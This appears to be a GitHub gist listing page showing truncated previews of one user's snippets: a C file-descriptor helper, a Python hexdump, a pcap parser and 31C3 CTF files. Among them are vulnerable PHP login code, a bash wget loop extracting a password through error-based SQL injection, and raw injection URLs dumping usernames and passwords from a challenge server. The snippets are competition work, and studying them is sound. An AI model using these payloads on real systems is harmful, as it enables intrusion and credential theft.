Boogy boogy
boogy
/ sendfd.c
Created
January 7, 2016 07:30
— forked from kokjo/sendfd.c
Send a file descriptor over an abstract unix domain socket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // compile with: gcc -static -o sendfd sendfd.c | |
| //./sendfd foobar / | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <sys/un.h> | |
| #include <strings.h> | |
| int send_fd(int sock, int fd){ | |
| // This function does the arcane magic for sending | |
| // file descriptors over unix domain sockets |
boogy
/ hexdump.py
Created
March 25, 2015 12:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def hexdump( src, length=16, sep='.' ): | |
| ''' | |
| @brief Return {src} in hex dump. | |
| @param[in] length {Int} Nb Bytes by row. | |
| @param[in] sep {Char} For the text part, {sep} will be used for non ASCII char. | |
| @return {Str} The hexdump | |
| @note Full support for python2 and python3 ! | |
| ''' | |
| result = []; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib2 | |
| import threading | |
| ROOT = 'http://aart.2015.ghostintheshellcode.com/' | |
| def register(username, password): | |
| req = urllib2.Request(ROOT+'register.php', data='username=%s&password=%s' % (username, password)) | |
| conn = urllib2.urlopen(req) | |
| def login(username, password): |
boogy
/ cloudfs-icmp.py
Created
January 18, 2015 18:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| from scapy.all import * | |
| r = rdpcap("cloudfs.pcap") | |
| l = len(r) | |
| print l | |
| D = [] | |
| for i in range(0, l): | |
| if ICMP in r[i]: | |
| print 'OK' |
boogy
/ 31c3ctf_index.php
Created
December 30, 2014 22:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php echo($logged?"Here's your secret ".$flag."":"Login to access the secret")?> |
boogy
/ 31c3ctf_login_head2.php
Created
December 30, 2014 20:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(@$_SESSION['is_ExclusiveMember']){header("location: ".$LINK);die();} | |
| if(isset($_POST['user'])){ | |
| if(@$_POST['user']===$uLOGIN && @$_POST['pass']===$uPASSWORD){ | |
| $_SESSION['is_ExclusiveMember']=1; | |
| header("location: ".$LINK); | |
| die(); | |
| }else{ | |
| $Error=1; | |
| } |
boogy
/ 31c3ctf_login_head1.php
Created
December 30, 2014 20:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(@$_SESSION['user']){header("location: ".$LINK);die();} | |
| if(isset($_POST['user'])){ | |
| if(mysqli_num_rows(mysqli_query($con,"SELECT * FROM users WHERE Us3rN4m3='".mysqli_real_escape_string($con,@$_POST['user'])."' AND P4sWW0rD_0F_M3_WTF='".mysqli_real_escape_string($con,@$_POST['pass'])."' "))>0){ | |
| $_SESSION=$_POST; | |
| header("location: ".$LINK);die(); | |
| }else{ | |
| $Error=1; | |
| } | |
| } |
boogy
/ 31c3ctf_pwd.sh
Created
December 30, 2014 20:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| str='ZD456ddssd65456lksndoiNzd654sdsd' | |
| while true | |
| do | |
| a=0; | |
| echo "New string: $str" | |
| for i in {a..z}; do | |
| wget --quiet -O $i 'http://188.40.18.70/PROFILE/55%5C/||extractvalue%283,concat%280x3a,%28select%0Blocate("'$str$i'",P4sWW0rD_0F_M3_WTF)%0Bfrom%0Busers%0Blimit%0B1,1%29%29%29--%0B' | |
| if grep ":1" $i; then | |
| str=$str$i |
boogy
/ 31c3ctf_sql3.sh
Created
December 30, 2014 20:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://188.40.18.70/PROFILE/55%5C/||extractvalue%283,concat%280x7e,%28select%09concat_ws%280x3a,Us3rN4m3,P4sWW0rD_0F_M3_WTF%29%09from%09users%09limit%091,1%29%29%29--%09 |
boogy
/ 31c3ctf_sql2.sh
Created
December 30, 2014 20:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://188.40.18.70/PROFILE/55%5C/||extractvalue%28null,concat%280x3a,%28select%09*%09from%28select%09*%09from%09users%09as%09a%09join%09users%09as%09b%09using%28id_user,Us3rN4m3,Em4iL4dR3Szz,S4cR3dT3xT0Fm3,MyPh0N3NumB3RHAHA,Addr3Zz0F_tHi5_D3wD,CHAR_LOL%29%29as%09x%29%29%29--%0B |